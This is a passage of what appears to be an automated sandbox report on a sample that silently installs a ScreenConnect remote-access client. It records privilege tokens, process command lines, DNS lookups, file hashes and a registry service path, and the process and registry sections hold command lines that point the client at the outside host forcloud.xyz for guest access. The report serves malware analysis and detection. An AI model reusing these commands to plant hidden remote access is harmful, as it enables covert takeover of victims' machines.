| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe
"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3B3FA75DA6090FA1D6B10FDD8DC4666D C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240633250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C50216D1B5C8D9063CE30DF11C96E2E2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E8B38A38F3824AA6F607D57AD88FD9CE E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c="
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "14beaf0b-de62-47f8-a1ec-9c03318254ed" "User"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
Files
memory/2944-0-0x0000000074F0E000-0x0000000074F0F000-memory.dmp
memory/2944-1-0x00000000031C0000-0x00000000031C8000-memory.dmp
memory/2944-2-0x0000000005AC0000-0x0000000005DB4000-memory.dmp
memory/2944-3-0x00000000056F0000-0x000000000577C000-memory.dmp
memory/2944-4-0x0000000074F00000-0x00000000756B0000-memory.dmp
memory/2944-5-0x0000000005790000-0x00000000057B2000-memory.dmp
memory/2944-6-0x00000000057C0000-0x000000000596A000-memory.dmp
memory/2944-7-0x0000000006370000-0x0000000006914000-memory.dmp
memory/2944-8-0x0000000074F00000-0x00000000756B0000-memory.dmp
memory/2944-9-0x0000000074F00000-0x00000000756B0000-memory.dmp
memory/2944-14-0x0000000074F00000-0x00000000756B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi
| MD5 | 6ebb0b130daf468e91c095bf931388cb |
| SHA1 | c503cd29966246a33d6b8196c4788e4d83dffa09 |
| SHA256 | 824fd5fc45bc205cc73a9545c396bfaebaa5460d93eeac2aff049bc11c2036f0 |
| SHA512 | e8d2153f8709f22f28fdb8b6867c2f3c7f6abc4180a44cd35eeb277ef09f181ab0a08c53de309aa641498d6208a20bd0d842c0bedead22d4df9ae4f95ff6bdc0 |
memory/2944-12-0x0000000074F00000-0x00000000756B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp
| MD5 | 845b0569d54305e62c6e8ffe198d217c |
| SHA1 | cd06c3d1554fe08099ada4f4448a23a6422e6234 |
| SHA256 | 4da6c507c746cd07ca4546e723d0d145bbf4d26ff8de13f1a0750ef323a89a2e |
| SHA512 | af45bb8199f2af323b9954da0d11eed51459708608d356bc40bd9d9189c02c2c902f533077724dd7c6a7068e564b5c8f621ef1032098cef26ed26d5bf26e23fe |
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\Microsoft.Deployment.WindowsInstaller.dll
| MD5 | 5ef88919012e4a3d8a1e2955dc8c8d81 |
| SHA1 | c0cfb830b8f1d990e3836e0bcc786e7972c9ed62 |
| SHA256 | 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d |
| SHA512 | 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684 |
memory/1740-42-0x0000000004E80000-0x0000000004EAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.InstallerActions.dll
| MD5 | 9260afe4bbde2549fc0b92f657c2e50a |
| SHA1 | 5580778a62b06d7b56d3f788727514551de31647 |
| SHA256 | 588d3a5e1b91d3756f74ea61c9c1b5f7871af924fab469cebb579f8aeb2fc135 |
| SHA512 | afce644ee04813e1e323b719e8ad3cfefe6e20ad0aa821f1325b8e0ae0144a7cff4e0f1f4b6f45df33f060392f94bcfd88d62b2218fd0bc573d65a20d80e968b |
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Core.dll
| MD5 | 3b1ba4bebefdc8a95b0f2f0b4e50c527 |
| SHA1 | 15551d2e8bfb829f3a96d161b43de820c0d417ce |
| SHA256 | a843b3a4549c43ef5bd8470cacf5d2f0f3b3c8110441fcc10079facc7db3de29 |
| SHA512 | f41595586cd5330537f5f02b392310b028e36f618e2583d125430ecd103ebbf6d2cf6befcfb1b32279eeb9fd7ef018f49131e3906fb61bc324da85d93a9a18c7 |
memory/1740-50-0x0000000004F60000-0x0000000004FEC000-memory.dmp
memory/1740-46-0x0000000004EC0000-0x0000000004ECC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Windows.dll
| MD5 | d196174cf03f86c8776e717f07d5d19f |
| SHA1 | bbd2c6a59229b3e4ec7c5742248f3f55a61dd216 |
| SHA256 | a1edd67a131505cc84d76601474c53874a56b5437b835838e4a866e20f6cd264 |
| SHA512 | cf4d159bcb42a1a7ea03f8877736cace109ae79998906b9178c74f7a9b63030cddc2bc94ef6c5f718e99c2d0039cf3589f8c4f2bf5b67db94b3b96d2c988b45b |
memory/1740-54-0x00000000051A0000-0x000000000534A000-memory.dmp
C:\Windows\Installer\MSIFD1E.tmp
| MD5 | ba84dd4e0c1408828ccc1de09f585eda |
| SHA1 | e8e10065d479f8f591b9885ea8487bc673301298 |
| SHA256 | 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852 |
| SHA512 | 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290 |
\??\Volume{f0eec59f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{291c9575-6640-4619-ba6c-8ec19e9d8a84}_OnDiskSnapshotProp
| MD5 | 6c3b76d02689c675d382e84056fa8e44 |
| SHA1 | 13e56afc104e3b727cc8a8783aa1937898807480 |
| SHA256 | 069a40b27b68d6a6458742f1faa61688bf464126ebfd28d95a9c263723d3b9d4 |
| SHA512 | 68428e9ce1e52449fa3fe50f6a3baf02dedb94f9c20d51091cd5b50252ea425508a187e66043134c6c114b4c5e23edd4ee2c614d2595609beab40651949b22c7 |
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
| MD5 | b887328d115c752911f6e990fba7b6f5 |
| SHA1 | 8e1e3444a3f30085409d261732d11407bfa93bb3 |
| SHA256 | 93ea2a8758fcff1dab55ed1b96dbf82764e40e8e2b2d67788c640a227ae1fe94 |
| SHA512 | f7a86a21d3f86bdb638d92652af24f30a9d36d8d4c34e0df096e4ac4cdf8b63aa40cec714ee4bbed9f4e0fee405da8ae43d2f52db4bb4c3e06c9a53fca6ad06d |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
| MD5 | 826314610d9e854477b08666330940b5 |
| SHA1 | 65b601d60042cf6f263cd38ac2f63cd06a9de159 |
| SHA256 | e54963cb63c9e471e2d3d59e55e4c7aeedccafdd616b99c4b3af230608e4bcc9 |
| SHA512 | 5c01d6de25d60eb6b1eb72b7fa6401b71153c2a740c41aeeb2bd302cc4e80f5c1a388b647ee16da196705ac8edbc60abda49b9a531517bb85959cc018fb5d1fb |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll
| MD5 | 3ff07c657068430ef677181d1f67066d |
| SHA1 | 37f7e9d2ccb65b4ea2733393015635ea1b43393e |
| SHA256 | d17cf13612039f6a4ca17b56c32399ccbe279a499c8d2f8e910b1fd6f4fff2b1 |
| SHA512 | 5552208b5649ceac2b32510ea12d409a85643d27e6a9c335e049195a507ae9211aee77574376fde059747998b60ae041e191635a67c3461585aba7f9b877b095 |
memory/4636-120-0x00000000017E0000-0x00000000017F8000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config
| MD5 | 095c85acc658f0733bc6941163ec234c |
| SHA1 | 298c53608e02cac620702cb6abe75c70560c03b1 |
| SHA256 | 8e3dc9d06b282a536e1af7806d7f434d5738d4932dae557ccd762bfeed0bfc11 |
| SHA512 | fe3fbe2bcd2baabcf192663dd7603cce1db1025a9d40ad98598d5441d892efc0c94aa41fe61256762538e0ed3bcc3e7958cdbf87c2d577ee3bdd561597635d03 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config
| MD5 | f7f74a2053a7c858ed989f07f81b9720 |
| SHA1 | dc585c95c643e7a6b3cbb63a080e660ffebbc7b9 |
| SHA256 | fe4d54400c7fae8710be0b9040d18e78bdde3a53953629275ce40ebdcd05d7b2 |
| SHA512 | fefcef4f03b7c52346bc789f95968f26adb889a6a891eb6d782afe9c38d2571d8c703d0ad4382304a208cb44132fcfc4cdec4b5259cae6d0ba560b0ac4480043 |
memory/4636-131-0x0000000003FA0000-0x0000000003FF0000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll
| MD5 | f311a8217807f6c85817058522e234a2 |
| SHA1 | ceb586b3cf7b0ee86ea8242d9b3d8641c9444cd1 |
| SHA256 | 032450cd037d9e0eec49e0b4ff44073d539775633fb4af6fd76d4cb19116aac9 |
| SHA512 | 5ef1f6b595af9cc7f788680ac3f3e9b8b12baafe734a8e2f675baa57f5ef2c69806492911bda54f11c5a4b8cf3cced82cfc6e0ecf214e45083e9f9aa6a83d039 |
memory/4636-135-0x0000000003FF0000-0x0000000004026000-memory.dmp
memory/4636-136-0x00000000042B0000-0x0000000004342000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll
| MD5 | 5adcb5ae1a1690be69fd22bdf3c2db60 |
| SHA1 | 09a802b06a4387b0f13bf2cda84f53ca5bdc3785 |
| SHA256 | a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5 |
| SHA512 | 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73 |
memory/4636-138-0x0000000004210000-0x0000000004251000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll
| MD5 | be74ab7a848a2450a06de33d3026f59e |
| SHA1 | 21568dcb44df019f9faf049d6676a829323c601e |
| SHA256 | 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d |
| SHA512 | 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc |
memory/4636-140-0x0000000004490000-0x0000000004562000-memory.dmp
C:\Config.Msi\e57fbb6.rbs
| MD5 | 6d4e03c4e249f0a09b6aa7f4141a7ae5 |
| SHA1 | 7690405857a223e93b04ade1772ef67b98ae2023 |
| SHA256 | ebb09f4dd5bd12386d89c3953cb1b2523e27a3a90ff893d983b3fd3dd24dfa9e |
| SHA512 | 258879157eb40695006f5192074db8843b6eddf767f0da07a1ebc1388d0d48084ed7b200968b4c2467d09939a7b7831f19c2cda722cf1ffcee733cc05c4c96a3 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources
| MD5 | 511202ed0ba32d7f09eab394c917d067 |
| SHA1 | dbd611720fd1730198f72dec09e8e23e6d6488f8 |
| SHA256 | f8398a235b29af6569f2b116e0299b95512d042f5a4cd38c98c79729a5fbdb9d |
| SHA512 | f04b08938f3ebf8cfa1a1157a94da3ae4699494bdce566619afa5b13a8f6ebe556d522c064e5ea02e343b59a489343f77e3ea2bb2ea390aae35a626f41cadc77 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources
| MD5 | 5cd580b22da0c33ec6730b10a6c74932 |
| SHA1 | 0b6bded7936178d80841b289769c6ff0c8eead2d |
| SHA256 | de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c |
| SHA512 | c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
| MD5 | ab5fa8d90645878d587f386d0e276c02 |
| SHA1 | a602a20735a1104851f293965f1fe4ab678bf627 |
| SHA256 | 316bbf433f1f803d113adf060c528ccc636656cee26b90f5fea011c1c73c7d16 |
| SHA512 | a181e23c8fa01bc1d9f0f9f95a5ca6112e2b61f34f4c1da696d3ccabbbd942bcc81a3f4a60921328a6020d28aed8711c22be33761cb685921d50fea8b1d7b986 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config
| MD5 | 728175e20ffbceb46760bb5e1112f38b |
| SHA1 | 2421add1f3c9c5ed9c80b339881d08ab10b340e3 |
| SHA256 | 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077 |
| SHA512 | fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7 |
memory/608-161-0x0000000000440000-0x00000000004D6000-memory.dmp
memory/608-162-0x0000000002580000-0x00000000025B6000-memory.dmp
memory/608-164-0x000000001B5D0000-0x000000001B77A000-memory.dmp
memory/608-163-0x000000001B390000-0x000000001B41C000-memory.dmp
memory/608-165-0x000000001C830000-0x000000001C9B6000-memory.dmp
memory/608-167-0x00000000025E0000-0x00000000025F8000-memory.dmp
memory/608-166-0x0000000002540000-0x0000000002558000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 17:06
Reported
2024-11-13 17:09
Platform
win7-20241010-en
Max time kernel
140s
Max time network
144s
Command Line
Signatures
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=eef8a2dd-7cdd-4d96-ac88-046f110ebda2&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAypwQqMSE80C7%2b83r5rB%2b5gAAAAACAAAAAAAQZgAAAAEAACAAAABz4llyKSKGXC4YC%2fhQUax1llOlyRp%2blcVdz46qHXpeLwAAAAAOgAAAAAIAACAAAADNXL9uItJ%2bMAk6l%2fxXe%2bbp8Dr94qV2kbvt3ErotkWmpaAEAABinbUxWPE81CWNx51hgVbSFx%2bNrzPyEJmsZrZF%2ftli5MW6BU%2frvmpwxl2uM%2bMgDHk4R%2fJHPjbi9mUig%2f4kuZkPMKFGJ9eUhzIk7MX5jipaJQ05HvQoVTtZy09%2bpdaKFmSsaC6lwqu1kottT5spMqUmannrWG%2ff8qpTwakvtmn3Aobppjyfk%2ba5Vk69WYb3727Tov%2fd0AqAl9E5%2bsYUW%2f74lNMtl8Am9G%2famNccxEGDGBo%2b8Vfu1G8YowJUYTypMxSV%2bEYAq%2b147T%2bMvyn6b106LSTLHBw7T%2bH7KQPwm35iiDN80HJWgJ8nxqoLSyJ2Tt34btAkUncyO27uHIEcB4r%2bejxY924y7VGSxavYq0F8XQjaX7hnigWYHLgKsR714w6Wy%2b0uoeKjAIGMA0Y28RN4Sdyr9v%2fklSOat9v3lV8gmcuLaEvbEj68cTEBd2gbcZlNjlBJP6xdXzDuLcwcdTTBfMOoniDaqEnYv0fefGtNtpWDIhHzqA0efBH9tVtrb3Q1lykXhj0aezk4rMRxdrOuiK6kFKOzpE4HHb3p7bpUWIcX2SpRfLzS1vWIQDZ0Pr2QVeZqEcuwBULecurFDnoyJIJBAwJ3YFJKuy45lKQ4t3GiW9gQ%2bz2FV5LJpPKo5u%2fgOatFzL8XEa2dlhjNctVMTnVZst%2bo%2fS3bldTtXW1JflxRUcktD1UBESTNnYzy19gf4vDBsQU730UPrMtPmz5MgOs6H%2b4AHoMhciX7V2FqBv5IAS7P0rOYbywh4j9KGRPKOHDpPmSF%2fnrBiDHIcZ6VMONcTbjCUvfsM1t7jUgpzSyqrDJR%2b%2bXNueg2Z2z%2frRtlehaM3VKEVWF9%2bxtkiCjR4SpYucyj8tT%2bV5S0%2bpxjMYBgtRa191RcjfydxZjR9ei6z2Rdx3qOoJnJFNVw8HKPneCYY1yX7IPu1orSR%2fSJg1VB3nsiLonSSTyKBbCFniY%2f2h%2brZTFVGn7TSLWhRJ4ncHvhdZB%2bZy8SkB29MpoduZ9B4El1%2fR5CPBQ5wIvbEcHhFeDRbvYwes1YjsPuxq8s5clcoK%2bG9ExleDI6gBc%2fAMj2orTyuIgaH8KTxi19x8DuhGpVf0BCFQPnsSGMhxsRIKjI835wR4AEY8i9vFX8MPeTuvUbPJQnnOJLXgA12bErawhrXUoZEUNqxMb4XZcy3lnVV5hzgoxouPD4BqOM%2bAB7avFqDx3bX82aHFeGFshhi9W5d1Qc9%2bADDK3VVWdMUAsuSyXeHYoUxHE2ZEyEcRvEsFd1nfNlbSCsJzPDM69L2z4siDSV2rxHGWeXSePLOOY7AekjTtYwNiy1073ySHDUX7WFnNdoW5ZYxkdPuGLhycYFVLFI8VFWUDk07Bc1eE%2bQhxy4TuN%2fbnugM6o4LIfka0VvpQJm9KnmTsVCk3FdgUrw1u%2fkkxYaj1bO6hgWpPvbHcj46vYecRZ%2f%2f7iPOVxaZrgEVBiOy3fMXP8st%2bc9ivOYICQmZ%2fQfF9e4GJJHBeWdCTLdYP%2bTS4uuxahNmuodMJuKvdw5o0m3587TBqVWyc6ANM30ztAPUY65dWo1v%2bFeWHbMcTBBxba5f2zUEUAAAAB2xS%2bAWDmhx2Ub14bMtVlP0cpw4z6xVig5oA4Brp71WnuLW%2fNaACTv0dPP5IyJF32BoNa6HhQjLWq4VH7sXzEB&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
